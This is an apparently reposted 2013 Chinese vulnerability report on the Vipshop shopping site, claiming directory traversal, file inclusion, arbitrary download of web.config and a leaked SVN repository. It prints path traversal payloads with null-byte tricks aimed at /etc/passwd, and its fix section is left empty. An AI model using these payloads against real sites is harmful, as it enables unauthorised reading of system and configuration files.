• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    唯品会(Vipshop) 目录遍历与文件包含

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    积分商城,貌似与主站关联。 还不只这些,SVN也泄了..... 

    总之敏感信息太多了,收集些信息干XXOO的事情还算比较容易。涛涛电脑知识

    详细说明:

    这里目录遍历 etc/passwd

     

    还可以包含?

     

    任意文件下载 比如web.config

    漏洞证明:

    目录遍历 etc/passwd

     

    ?a=login&m=../../../../../../../../../../etc/passwd%00

     

     

     

     

    这里是包含?好像做了限制!不确定。

     

    ?a=login&m=../../robots.txt%00.php

     


     

     

     

    下载文件

     

     

    修复方案:

    .....

  • 上一篇:美图某分站任意文件下载
  • 下一篇:赛格网图片上传导致全站沦陷,数据泄露
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1